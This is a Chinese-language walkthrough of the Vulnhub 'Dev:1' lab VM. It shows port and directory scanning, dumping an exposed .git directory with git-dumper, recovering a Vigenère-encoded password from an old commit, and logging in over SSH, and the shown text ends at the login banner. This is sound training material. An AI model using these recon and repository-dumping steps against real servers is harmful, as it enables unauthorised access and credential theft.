Vulnhub之Dev_1靶机详细解题过程
Dev:1
靶机名称: Dev:1
靶机地址:https://www.vulnhub.com/entry/dev-1,574/
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.68.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:7d:6d:47 1 60 PCS Systemtechnik GmbH
192.168.56.183 08:00:27:bd:54:32 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.183
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.183 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 23:41 EST
Nmap scan report for bogon (192.168.56.183)
Host is up (0.000089s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ae:98:ea:ab:60:97:33:6a:24:8a:87:ae:52:1b:8f:01 (RSA)
| 256 71:bb:5b:26:ea:2c:97:89:13:b6:b3:67:da:c7:15:09 (ECDSA)
|_ 256 f7:49:8e:51:58:bc:33:db:f6:93:01:89:13:02:ec:d6 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:BD:54:32 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds
NMAP扫描结果报名目标主机有2个开放端口:22(SSH服务)、80(HTTP服务)
Get Access
访问80端口,返回Apache默认页面, 也不存在robots.txt文件
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ curl http://192.168.56.183/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 192.168.56.183 Port 80</address>
</body></html>
接下里扫描一下有无目录?
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ gobuster dir -u http://192.168.56.183 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.183
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/17 02:14:31 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 279]
/wwwdev (Status: 301) [Size: 317] [--> http://192.168.56.183/wwwdev/]
Progress: 219294 / 220561 (99.43%)===============================================================
2022/11/17 02:14:58 Finished
===============================================================
──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ curl http://192.168.56.183/wwwdev/
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, viewport-fit=cover">
<meta name="apple-mobile-web-app-capable" content="yes" />
<!-- Don't forget to merge the changes! -->
<!-- Page Title -->
<title>Under construction!</title>
<!-- Compressed Styles -->
<link href="css/slides.min.css?41331" rel="stylesheet" type="text/css">
<!-- Custom Styles -->
<!-- <link href="css/custom.css" rel="stylesheet" type="text/css"> -->
<!-- jQuery 3.3.1 -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<!-- Compressed Scripts -->
<script src="js/slides.min.js?41331" type="text/javascript"></script>
<!-- Custom Scripts -->
<!-- <script src="js/custom.js" type="text/javascript"></script> -->
<!-- Fonts and Material Icons -->
<link rel="stylesheet" as="font" href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,500,600,700|Material+Icons"/>
</head>
<body class="slides chain simplifiedMobile animated">
...
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ dirb http://192.168.56.183
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Nov 17 02:23:25 2022
URL_BASE: http://192.168.56.183/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.183/ ----
+ http://192.168.56.183/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.183/server-status (CODE:403|SIZE:279)
-----------------
END_TIME: Thu Nov 17 02:23:26 2022
DOWNLOADED: 4612 - FOUND: 2
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ gobuster dir -u http://192.168.56.183/wwwdev/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.183/wwwdev/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/17 02:23:44 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 324] [--> http://192.168.56.183/wwwdev/assets/]
/css (Status: 301) [Size: 321] [--> http://192.168.56.183/wwwdev/css/]
/js (Status: 301) [Size: 320] [--> http://192.168.56.183/wwwdev/js/]
Progress: 217357 / 220561 (98.55%)===============================================================
2022/11/17 02:24:10 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ gobuster dir -u http://192.168.56.183/wwwdev/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.183/wwwdev/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2022/11/17 02:24:37 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 30845]
/assets (Status: 301) [Size: 324] [--> http://192.168.56.183/wwwdev/assets/]
/css (Status: 301) [Size: 321] [--> http://192.168.56.183/wwwdev/css/]
/js (Status: 301) [Size: 320] [--> http://192.168.56.183/wwwdev/js/]
/.html (Status: 403) [Size: 279]
Progress: 1100533 / 1102805 (99.79%)===============================================================
2022/11/17 02:26:55 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ dirb http://192.168.56.183/wwwdev/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Nov 17 02:27:08 2022
URL_BASE: http://192.168.56.183/wwwdev/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.183/wwwdev/ ----
+ http://192.168.56.183/wwwdev/.git/HEAD (CODE:200|SIZE:21)
==> DIRECTORY: http://192.168.56.183/wwwdev/assets/
==> DIRECTORY: http://192.168.56.183/wwwdev/css/
+ http://192.168.56.183/wwwdev/index.html (CODE:200|SIZE:30845)
==> DIRECTORY: http://192.168.56.183/wwwdev/js/
---- Entering directory: http://192.168.56.183/wwwdev/assets/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.183/wwwdev/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.56.183/wwwdev/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Thu Nov 17 02:27:10 2022
DOWNLOADED: 4612 - FOUND: 2
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ nikto -h http://192.168.56.183
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.183
+ Target Hostname: 192.168.56.183
+ Target Port: 80
+ Start Time: 2022-11-17 02:27:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5b035e19b6fe1, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ 7915 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-11-17 02:27:38 (GMT-5) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ nikto -h http://192.168.56.183/wwwdev/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.183
+ Target Hostname: 192.168.56.183
+ Target Port: 80
+ Start Time: 2022-11-17 02:27:45 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /wwwdev/, inode: 787d, size: 5b04aa4100d44, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /wwwdev/css/: Directory indexing found.
+ OSVDB-3092: /wwwdev/css/: This might be interesting...
+ OSVDB-3092: /wwwdev/.git/index: Git Index file may contain directory listing information.
+ /wwwdev/.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /wwwdev/.git/config: Git config file found. Infos about repo details may be present.
+ 7915 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2022-11-17 02:27:59 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.41) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
直到这里通过nikto才发现有.git目录
/wwwdev/.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /wwwdev/.git/config: Git config file found. Infos about repo details may be present.
这应该是突破点, 需要用到工具git-dumper
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ cp -r ~/Tools/git-dumper .
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ ls
git-dumper nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Dev]
└─$ cd git-dumper
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper]
└─$ ls
git_dumper.py LICENSE pyproject.toml README.md requirements.txt setup.cfg
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper]
└─$ python git_dumper.py http://192.168.56.183/wwwdev/.git backup
[-] Testing http://192.168.56.183/wwwdev/.git/HEAD [200]
[-] Testing http://192.168.56.183/wwwdev/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://192.168.56.183/wwwdev/.git/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/COMMIT_EDITMSG [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/branches/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/info/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.gitignore [404]
[-] http://192.168.56.183/wwwdev/.gitignore responded with status code 404
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/description [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/index [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/config [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/HEAD [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/info/exclude [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/heads/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/remotes/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/tags/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/remotes/origin/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/heads/main [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/HEAD [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/heads/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/remotes/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/refs/remotes/origin/main [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/post-update.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-commit.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-push.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-receive.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/update.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/heads/main [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/remotes/origin/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/hooks/commit-msg.sample [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/logs/refs/remotes/origin/main [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/0d/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/2b/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4e/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/3d/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4d/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/1a/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/03/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/02/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/8a/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/1e/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/5f/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/9c/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/7e/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4f/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/36/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/41/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/28/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/26/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/15/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/25/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/46/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/66/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/69/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/33/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/78/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/89/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/59/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a3/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/58/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/76/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/90/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/94/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a4/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a7/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/b7/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ae/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ba/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/b5/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/bd/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/cd/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/c0/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/cf/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/c8/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/d1/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e2/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/df/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e3/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f9/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f0/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e6/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e5/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/fe/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/info/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/pack/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/80/ [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/2b/f6e5d75bad126c38776eab62e32a157c8b3e20 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4e/fea96bd51cd68f4989d276c10ae0726275b9b6 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/1a/bb1945a3b0a5426b4f6b5744f464ff9d4fdff2 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/0d/7005caef4ca39df32e58459ecd2b0d84f5b095 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/02/3c940fb87367c8cd7c7dbdc2a6fa18cca18bfd [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/03/0b875624dc0f8dc8db37d176c0c47fe2c5bfe3 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/3d/d400f34512b2a401935c24ecd52695c00e0fd1 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/7e/7ee5469d3b14875c7dca6a8c43cb6d3958a4ad [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/5f/10a6160f03efb05707945e265dac990cf4f810 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4d/896226bde1925610098517cf97d7c8795530a6 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/8a/58fed23004a9c8b147024df3b80643f15aee17 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/1e/e6576d05f047394ffe8a152d4a28ccc3f8e274 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/9c/8afc48d9f57ae7c5c5506d612e89f0372cc38d [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/4f/c73b0ccbad17e97e0d472225f2dcfa55dbdf41 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/41/9307de82a01c0eaf24d49693ef27d9b03014cc [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/36/24ee753f5818c330b57f2e185d1ba46918b623 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/25/e79d498188a2cf825d78b5518ca7dc2ed6b72a [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/28/b1b07b549943e971bd420cf5d45b76c033d524 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/15/b4a272a081c7f5af240920bbf8af42622fc06f [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/66/1bdaa911be3bc3da002371b6007121c8c9ed6b [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/26/5592bf366986046ea395b10d4d378672347080 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/69/9558891301a8fc88eb8350946718169c693de2 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/46/8d5a3abf492004162a4d261a91e683725ad221 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/59/6f6443878d3ad8984fed5f3883b4a5afb0c468 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/89/64ec37df319b2beeaa1b118caf673e654770a6 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/76/d03887b3deff5b88c5bd06902ab8d9b4aa4a1d [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/78/b0a41a535b6860c2ac0dd6d41f0feb48f3c613 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/58/c651c69b37acdc408d8a0b7c09692da5491af9 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a4/d37efc67f8ec3aafab8a1db239cd55e7984a2c [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/b7/f734503b2f7f6ccff4c644636264fb1bfa009c [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ba/1936d7f1191e6e7649373abade7eabab109508 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a3/c232884ee15fb12b18158a4fbd001d7bd7ed40 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/33/b3db8b5079f0f6442212fdc58e084f63c24495 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a7/cd09a5dca66b7c43439e9d57618280a7a29613 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/90/318c8733437e835b0daccb5d32cab34c3b3d0c [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ae/b0bfbb8423fcd06977fa71fa0ad26d2e4bcd51 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/a7/ba3da30112780a7be1e4411b066762193ab06b [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/ae/b57abbdaa46b80d84af666ac0d39b122247efc [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/94/6e7bc9f5bd9a73573fe4077ac03a5c87d004a7 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/c0/de897fd45fcf19efc2de758ad15511e6e7d435 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/c0/24224e15c52f95a1ea06af09b3640a95a5cf9e [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/cd/9c3bca0fb28dbed3c3065f1c393eb3f5a1b777 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/bd/b0b8139855a2a8ddaa9ec82b445841673c84ce [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/b5/5fee4d85c9a08e363d7f70dbe12343af61cdeb [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/d1/ca4de938c76444bc4b1fda038fbffbff33630a [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/d1/ce1ef9f41b4be13643c95f388735d4ba1dabdf [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/c8/bee72df024a525f4db1f62abcd8125ad0d4edb [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f9/4ac75809c0445dacee9b41bcf29e6bd818981d [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e2/657effb3753941e2b0d2be925ac3e0ae4f6201 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/bd/e65b29174319ce8d2e66368d7e59ed9ea0a0d4 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/cf/4c40b6398dcc0f0e6fff3e99edc9da1e4eefa7 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f9/e2a3675f4b2f2196276fd11cac9d210a2fc737 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/fe/b7977eb39ca24d571bca34d3ac1c40e3a05d18 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/df/8c6e8d16c6c3138535b2e4ab18444af4ae144e [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e3/8e73578d11b5f5d682312c5058d1a9a378e4b3 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e5/a9372d0bca672950313c7178762bb18381564a [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f9/fce0c938b4e42309dd0133ef9d32eccc0de4ed [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/e6/b18cce7dd281e69c4849c5fec752699b7c9383 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/f0/f42ebee63e1bf434ff936c9c47dc8952156ba6 [200]
[-] Fetching http://192.168.56.183/wwwdev/.git/objects/80/72e242fdc09129cac94c569f6cc5ee0aef8059 [200]
[-] Running git checkout .
Updated 48 paths from the index
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper]
└─$ ls
backup git_dumper.py LICENSE pyproject.toml README.md requirements.txt setup.cfg
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper]
└─$ cd backup
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper/backup]
└─$ ls
ajax-email.php assets css index.html js scss
这样就把repo git clone到Kali Linux本地了
┌──(kali㉿kali)-[~/…/Dev/git-dumper/backup/.git]
└─$ git log
commit 8072e242fdc09129cac94c569f6cc5ee0aef8059 (HEAD -> main, origin/main)
Author: User <f3dai@dev.local>
Date: Mon Oct 12 23:44:09 2020 +0100
updated: removed file
commit f9e2a3675f4b2f2196276fd11cac9d210a2fc737
Author: User <f3dai@dev.local>
Date: Mon Oct 12 23:43:00 2020 +0100
First commit :)
查看git日志,有两个提交,第二个提交是删除文件,现在checkout一下第一个提交(Commit)
──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper/backup]
└─$ git checkout f9e2a3675f4b2f2196276fd11cac9d210a2fc737
Note: switching to 'f9e2a3675f4b2f2196276fd11cac9d210a2fc737'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:
git switch -c <new-branch-name>
Or undo this operation with:
git switch -
Turn off this advice by setting config variable advice.detachedHead to false
HEAD is now at f9e2a36 First commit :)
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper/backup]
└─$ git log
commit f9e2a3675f4b2f2196276fd11cac9d210a2fc737 (HEAD)
Author: User <f3dai@dev.local>
Date: Mon Oct 12 23:43:00 2020 +0100
First commit :)
checkout后就形成了一个文件cred
┌──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper/backup]
└─$ cat cred
D1yceX0jgixhk (slime)
从 git log,我们知道用户名是f3dai
这里需要注意D1yceX0jgix,不是直接的密码而是vignere (key是slime),哈哈我不知道为什么是这种加密算法
用在线网站破解该密码得到:L1nusT0rvalds
https://www.cs.du.edu/~snarayan/crypt/vigenere.html
SSH登录用户f3dai
──(kali㉿kali)-[~/Vulnhub/Dev/git-dumper/backup]
└─$ ssh f3dai@192.168.56.183
The authenticity of host '192.168.56.183 (192.168.56.183)' can't be established.
ED25519 key fingerprint is SHA256:YvfP9x0HRPWzLXji10/dn8yuYFgbVGNeO2/z1azmFwE.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.183' (ED25519) to the list of known hosts.
f3dai@192.168.56.183's password:
Permission denied, please try again.
f3dai@192.168.56.183's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-48-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2025.
